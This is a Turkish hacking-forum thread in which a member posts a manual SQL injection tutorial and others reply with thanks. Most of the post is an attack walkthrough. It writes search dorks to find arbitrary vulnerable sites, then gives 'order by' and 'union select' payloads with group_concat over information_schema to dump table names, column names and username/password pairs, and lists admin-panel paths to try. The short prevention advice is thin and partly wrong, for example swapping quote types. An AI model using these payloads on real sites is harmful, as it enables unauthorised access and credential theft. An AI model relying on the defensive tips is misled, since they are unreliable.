THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Manuel sql injection ve korunma yolları

EndLoss12 - ait Kullanıcı Resmi (Avatar)
Basın & Medya Ekibi (Stajyer)
Üyelik tarihi:
03/2018
Mesajlar:
240
Konular:
59
Teşekkür (Etti):
124
Teşekkür (Aldı):
30
Ticaret:
(0) %
06-09-2018 02:21
#1
Manuel sql injection ve korunma yolları
Merhaba tht ailesi bugün sql injection yöntemini göstereceğim bu yöntem en çok bilinen yöntemlerden biridir ,en popüler açıklardan biridir.Öncelikle Sql nedir ondan bahsedelim.


Sql nedir?

Arkadaşlar Sql bir veritabanı yönetim dilidir.Veritabanı tablolar ve kolonlardan oluşur .Ve verilerin tutulduğu yapıdır diyebiliriz.Bu veritabanlarını oluşturmak için bu dil gereklidir.
Sql açığı neden oluşur.
Sql açığı , web uygulamasının kullanıcıdan gelen girdiği doğru şekilde kontrol etmeden dinamik bir Sql cümleciği oluşturmasından dolayı oluşur
Sql açığından kaçınmanın yolları
Birinci yol:
**** karakterlerden açınmak yani mesela tek tırnak yerine çift tırnak kullanmak bu uygulamanın bunun tek tırnak olduğunu anlamasını sağlayacaktır.
İkinci yol:
Verilerin veri tiplerini kontrol etmek.Mesela nümerik bir veri bekleniyorsa nümerik mi bunun kontrol edilmesi önemlidir.String bir veriyse **** karakter kullanmadığına dikkat edilmelidir.Yukarda verdiğim örnek gibi tehlikeli ifadelerden kaçınmak.
Sql Dorku yazma
Evet arkadaşlar şimdi de bu açığı sömürmeye gelelim ilk yapacağımız şey dork yazmaktır.Hazır dorkları kullanmak çok sağlıklı olmaz.Biz kendi dorkumuzu yazacağız.Kısaca dork belirli kelimelerin kullanılarak istenen türde sitelerin bulunmasıdır.Biz sql açığı olabilecek siteleri bulmak için sql dorku yazacağız başlayalım:
İlk yazacağımız ifade
Kod:
inurl:
Bu ifade bu kelimeyle ilgili bütün siteleri göster anlamına gelir.
İki
Kod:
kelime.php?id=
Budur burda kelimeleri bulmak zordur şu siteyi kullanabilirsiniz Random Word Generator - Word
Sitemize geldik sonuna ' işareti ekliyoruz şu tarz birşey verirse:
Kod:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 in
Yani kısacası sql ile ilgili bir hata verirse sql açığı vardır.
Sitenin kolon sayısını öğrenme
Arkadaşlar sitenin bir kolon sayısı vardır o sayıdan 1 fazlasında site çalışmaz biz o sayıyı bulacağız
Kullanacağımız komut :
Kod:
+order+by+sayı
Bu şekilde birden başlayıp gidip ilk unknown column dediği sayıdan önceki sayı kolon sayısıdır.
Kolon sayısını ekrana yansıtma

Şimdi ise kolon sayısını ekrana yansıtacağız bu sayıyla çok bilgileri çekeriz. sitenin sonuna verdiğimiz komutu temizleyip
Kod:
+union+select+0,1,2,3,4,5
Bu şekilde gidiyoruz 0 dan başlarsanız kolon sayısına kadar gidin(dahil değil) birden başlarsanız dahil
Tabloları çekme
Kolon sayısını ekrana yansıttık. Şimdi tabloları çekeceğiz.Bunun için yansıttığımız kolon sayısını silip yerine
Kod:
group_concat(table_name)
Sonuna ise
Kod:
+from+information_schema.tables
Bu komutla tablo isimlerini çekersiniz şimdi o table isimlerine iyi bakın şöyle bir table görürseniz "users,admin"anladınız işte bu tarz birşey görürseniz demektir o table işimize yarayacak.O ismi kopyalıyorsunuz ve şu siteye geliyorsunuz Online String to ASCII or Hexa or Binary converter String kısmına table ismini yazıyoruz sonra bir altındaki yeri kopyalıyoruz
Kolonları çekme
"information_schema.tables" ın sonundaki "tables"ı "columns " yapıyoruz sonra sonuna
Kod:
+where+table_name=char(yapıştırıyoruz ve boşlukları silip virgül koyuyoruz)
Ve "group_concat(table_name)" dekini "column name" yapıyoruz ve enterlıyoruz.
Kullanıcı Bilgilerine ulaşma
username,password'u göreceksiniz diyelim ki göremediniz o zaman iş yattı demektir ama ben gördüğünüzü varsayarak devam edeceğim group_concat'ın içine
Kod:
username,0x3a,password
Yazıyoruz ve sondan from + ya kadar silip tablonun ismini yazıyoruz (users tablosu)
Evet arkadaşlar bilgileri gördünüz orda şansınıza birer tane user,password görürsünüz ya da birden fazla o zaman bunu bulmak size bağlı deniyerek bulabilirsiniz muhtemelen şifre md5 le şifrelenmiş çıkacaktır Onlarla ilgili konulara bakabilirsiniz benim konum bu kadar
Admin panelini bulmak için sitenin ismine kadar silip mesela site.com/resimler de resimleri silip şunları deneyin
Kod:
admin,admin.php,admin.asp,login,login.php,login.asp 
administrator,administrator.php,administrator.asp,robots.txt,cpanel
prototyqe Teşekkür etti.
devilraw - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2018
Mesajlar:
165
Konular:
17
Teşekkür (Etti):
6
Teşekkür (Aldı):
19
Ticaret:
(0) %
06-09-2018 08:38
#2
Eline Sağlık
---------------------
"Türk budur: Yildirimdir, kasirgadir, dünyayi aydinlatan günestir."
prototyqe - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2011
Nereden:
Chicago İL
Mesajlar:
5.216
Konular:
2353
Teşekkür (Etti):
1729
Teşekkür (Aldı):
1495
Ticaret:
(0) %
06-09-2018 09:23
#3
helal sana çok güzel açıklayıcı konu olmuş
---------------------
EndLoss12 - ait Kullanıcı Resmi (Avatar)
Basın & Medya Ekibi (Stajyer)
Üyelik tarihi:
03/2018
Mesajlar:
240
Konular:
59
Teşekkür (Etti):
124
Teşekkür (Aldı):
30
Ticaret:
(0) %
06-09-2018 13:00
#4
Alıntı:
prototyqe´isimli üyeden Alıntı Mesajı göster
helal sana çok güzel açıklayıcı konu olmuş
Teşekkürler
EndLoss12 - ait Kullanıcı Resmi (Avatar)
Basın & Medya Ekibi (Stajyer)
Üyelik tarihi:
03/2018
Mesajlar:
240
Konular:
59
Teşekkür (Etti):
124
Teşekkür (Aldı):
30
Ticaret:
(0) %
06-09-2018 13:05
#5
Alıntı:
TuranAlemdar´isimli üyeden Alıntı Mesajı göster
Ellerinize Sağlık
Teşekkürler yüzbaşım

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler